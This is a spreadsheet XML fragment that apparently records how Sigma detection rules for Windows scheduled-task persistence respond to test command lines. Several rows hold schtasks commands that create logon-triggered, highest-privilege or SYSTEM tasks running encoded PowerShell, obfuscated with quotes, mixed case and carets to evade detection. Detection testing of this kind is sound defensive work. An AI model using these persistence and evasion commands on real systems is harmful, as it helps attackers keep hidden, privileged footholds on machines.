      <c r="J1485" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1485" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1486" ht="15.75" customHeight="1" s="42">
      <c r="A1486" s="43" t="n"/>
      <c r="B1486" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C1486" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D1486" s="44" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E1486" s="4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F1486" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1486" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1486" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1486" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1486" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1486" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1487" ht="15.75" customHeight="1" s="42">
      <c r="A1487" s="43" t="n"/>
      <c r="B1487" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C1487" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D1487" s="44" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E1487" s="4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F1487" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1487" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1487" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1487" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1487" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1487" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1488" ht="15.75" customHeight="1" s="42">
      <c r="A1488" s="43" t="n"/>
      <c r="B1488" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C1488" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D1488" s="44" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E1488" s="4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F1488" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1488" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1488" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1488" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1488" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1488" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1489" ht="15.75" customHeight="1" s="42">
      <c r="A1489" s="43" t="n"/>
      <c r="B1489" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C1489" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D1489" s="44" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E1489" s="4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F1489" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1489" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1489" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1489" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1489" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1489" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1490" ht="15.75" customHeight="1" s="42">
      <c r="A1490" s="43" t="n"/>
      <c r="B1490" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C1490" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D1490" s="44" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E1490" s="4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F1490" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1490" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1490" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1490" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1490" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1490" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1491" ht="15.75" customHeight="1" s="42">
      <c r="A1491" s="43" t="n"/>
      <c r="B1491" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C1491" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D1491" s="44" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E1491" s="4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F1491" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1491" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1491" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1491" s="44" t="inlineStr">
        <is>
          <t>Suspicious Command Patterns In Scheduled Task Creation (f2c64357-b1d2-41b7-849f-34d2682c0fad); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1491" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1491" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1492" ht="15.75" customHeight="1" s="42">
      <c r="A1492" s="43" t="n"/>
      <c r="B1492" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C1492" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D1492" s="44" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E1492" s="4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F1492" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1492" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1492" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1492" s="44" t="n"/>
      <c r="J1492" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1492" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1493" ht="15.75" customHeight="1" s="42">
      <c r="A1493" s="43" t="n"/>
      <c r="B1493" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C1493" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D1493" s="44" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E1493" s="43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F1493" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1493" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1493" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1493" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1493" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1493" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1494" ht="15.75" customHeight="1" s="42">
      <c r="A1494" s="43" t="n"/>
      <c r="B1494" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C1494" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D1494" s="44" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E1494" s="4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F1494" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1494" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1494" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1494" s="44" t="n"/>
      <c r="J1494" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1494" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1495" ht="15.75" customHeight="1" s="42">
      <c r="A1495" s="43" t="n"/>
      <c r="B1495" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C1495" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D1495" s="44" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E1495" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "BypassTask" /TR "powershell.exe -EncodedCommand aQBlAHgAZQB..." /SC ONLOGON /RL HIGHEST /F</t>
        </is>
      </c>
      <c r="F1495" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1495" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1495" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1495" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1495" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1495" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1496" ht="15.75" customHeight="1" s="42">
      <c r="A1496" s="43" t="n"/>
      <c r="B1496" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C1496" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D1496" s="44" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E1496" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /tN "BypassTask" /"TR" "powershell.exe -"EncodedCommand" aQBlAHgAZQB..." /sc ONLOGON /"RL" HIGHEST /F</t>
        </is>
      </c>
      <c r="F1496" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1496" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1496" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1496" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1496" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1496" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1497" ht="15.75" customHeight="1" s="42">
      <c r="A1497" s="43" t="n"/>
      <c r="B1497" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C1497" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D1497" s="44" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E1497" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /"TN" "BypassTask" /tR "powershell.exe -enc aQBlAHgAZQB..." /SC ONLOGON /Rl HIGHEST /f</t>
        </is>
      </c>
      <c r="F1497" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1497" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1497" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1497" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a)</t>
        </is>
      </c>
      <c r="J1497" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1497" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1498" ht="15.75" customHeight="1" s="42">
      <c r="A1498" s="43" t="n"/>
      <c r="B1498" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C1498" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D1498" s="44" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E1498" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /"TN" "BypassTask" /tR "powershell.exe -"EncodedCommand" aQBlAHgAZQB..." /"SC" ONLOGON /Rl HIGHEST /F</t>
        </is>
      </c>
      <c r="F1498" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1498" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1498" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1498" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1498" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1498" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1499" ht="15.75" customHeight="1" s="42">
      <c r="A1499" s="43" t="n"/>
      <c r="B1499" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C1499" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D1499" s="44" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E1499" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /"TN" "BypassTask" /TR "powershell.exe -enc aQBlAHgAZQB..." /SC ONLOGON /Rl HIGHEST /"F"</t>
        </is>
      </c>
      <c r="F1499" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1499" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1499" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1499" s="4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1499" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1499" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1500" ht="15.75" customHeight="1" s="42">
      <c r="A1500" s="43" t="n"/>
      <c r="B1500" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C1500" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D1500" s="44" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E1500" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /tN "BypassTask" /tr "powershell.exe -eNcOdEDcoMmand aQBlAHgAZQB..." /SC ONLOGON /rl HIGHEST /F</t>
        </is>
      </c>
      <c r="F1500" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1500" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1500" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1500" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1500" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1500" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1501" ht="15.75" customHeight="1" s="42">
      <c r="A1501" s="43" t="n"/>
      <c r="B1501" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C1501" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D1501" s="44" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E1501" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /tN "BypassTask" /"TR" "powershell.exe -enc aQBlAHgAZQB..." -"SC" ONLOGON /RL HIGHEST /F</t>
        </is>
      </c>
      <c r="F1501" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1501" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1501" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1501" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a)</t>
        </is>
      </c>
      <c r="J1501" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1501" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1502" ht="15.75" customHeight="1" s="42">
      <c r="A1502" s="43" t="n"/>
      <c r="B1502" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C1502" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D1502" s="44" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E1502" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CreATe /TN "BypassTask" /tr "powershell.exe -enc aQBlAHgAZQB..." /SC ONLOGON /RL HIGHEST /f</t>
        </is>
      </c>
      <c r="F1502" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1502" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1502" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1502" s="4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1502" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1502" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1503" ht="15.75" customHeight="1" s="42">
      <c r="A1503" s="43" t="n"/>
      <c r="B1503" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C1503" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D1503" s="44" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E1503" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /tn "BypassTask" /tR "powershell.exe -enc aQBlAHgAZQB..." /SC ONLOGON /RL HIGHEST /f</t>
        </is>
      </c>
      <c r="F1503" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1503" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1503" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1503" s="4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1503" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1503" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1504" ht="15.75" customHeight="1" s="42">
      <c r="A1504" s="43" t="n"/>
      <c r="B1504" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C1504" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D1504" s="44" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E1504" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" -"TN" "BypassTask" -"TR" "powershell.exe -ENcOdEdCOmmANd aQBlAHgAZQB..." /sc ONLOGON /RL HIGHEST /F</t>
        </is>
      </c>
      <c r="F1504" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1504" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1504" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1504" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a)</t>
        </is>
      </c>
      <c r="J1504" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1504" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1505" ht="15.75" customHeight="1" s="42">
      <c r="A1505" s="43" t="n"/>
      <c r="B1505" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C1505" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D1505" s="44" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E1505" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /tn "BypassTask" -"TR" "powershell.exe -ENCodeDcOMMAND aQBlAHgAZQB..." /SC ONLOGON /Rl HIGHEST /f</t>
        </is>
      </c>
      <c r="F1505" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1505" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1505" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1505" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a)</t>
        </is>
      </c>
      <c r="J1505" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1505" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1506" ht="15.75" customHeight="1" s="42">
      <c r="A1506" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1506" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type</t>
        </is>
      </c>
      <c r="C1506" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types</t>
        </is>
      </c>
      <c r="D1506" s="44" t="inlineStr">
        <is>
          <t>24c8392b-aa3c-46b7-a545-43f71657fe98</t>
        </is>
      </c>
      <c r="E1506" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "T1053_005_OnLogon" /sc "onlogon" /tr "cmd.exe /c calc.exe"</t>
        </is>
      </c>
      <c r="F1506" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1506" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1506" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1506" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1506" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K1506" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1507" ht="15.75" customHeight="1" s="42">
      <c r="A1507" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1507" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type</t>
        </is>
      </c>
      <c r="C1507" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types</t>
        </is>
      </c>
      <c r="D1507" s="44" t="inlineStr">
        <is>
          <t>24c8392b-aa3c-46b7-a545-43f71657fe98</t>
        </is>
      </c>
      <c r="E1507" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c schtasks.exe /create /tn "T1053_005_OnLogon" /sc on^lo^gon /tr "cmd.exe /c calc.exe"</t>
        </is>
      </c>
      <c r="F1507" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1507" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1507" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1507" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1507" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K1507" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1508" ht="15.75" customHeight="1" s="42">
      <c r="A1508" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1508" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type</t>
        </is>
      </c>
      <c r="C1508" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types</t>
        </is>
      </c>
      <c r="D1508" s="44" t="inlineStr">
        <is>
          <t>24c8392b-aa3c-46b7-a545-43f71657fe98</t>
        </is>
      </c>
      <c r="E1508" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -create -tn "T1053_005_OnLogon" -sc "ONCE" -tr "cmd.exe /c calc.exe" -st 20:10</t>
        </is>
      </c>
      <c r="F1508" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1508" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1508" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1508" s="43" t="n"/>
      <c r="J1508" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K1508" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1509" ht="15.75" customHeight="1" s="42">
      <c r="A1509" s="43" t="n"/>
      <c r="B1509" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1509" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1509" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1509" s="44" t="inlineStr">
        <is>
          <t>schtasks /Create /TN "TestTask" /TR "calc.exe" /RU SYSTEM /SC ONLOGON</t>
        </is>
      </c>
      <c r="F1509" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1509" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1509" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1509" s="43" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges (89ca78fd-b37c-4310-b3d3-81a023f83936); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1509" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1509" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1510" ht="15.75" customHeight="1" s="42">
      <c r="A1510" s="43" t="n"/>
      <c r="B1510" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1510" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1510" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1510" s="44" t="inlineStr">
        <is>
          <t>schtasks -"Create" /"TN" "TestTask" /TR "calc.exe" -"RU" SYSTEM /sC ONLOGON</t>
        </is>
      </c>
      <c r="F1510" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1510" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1510" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1510" s="44" t="n"/>
      <c r="J1510" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1510" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1511" ht="15.75" customHeight="1" s="42">
      <c r="A1511" s="43" t="n"/>
      <c r="B1511" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1511" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1511" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1511" s="44" t="inlineStr">
        <is>
          <t>schtasks /crEATe /TN "TestTask" /TR "calc.exe" /"RU" SYSTEM /SC ONLOGON</t>
        </is>
      </c>
      <c r="F1511" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1511" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1511" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1511" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
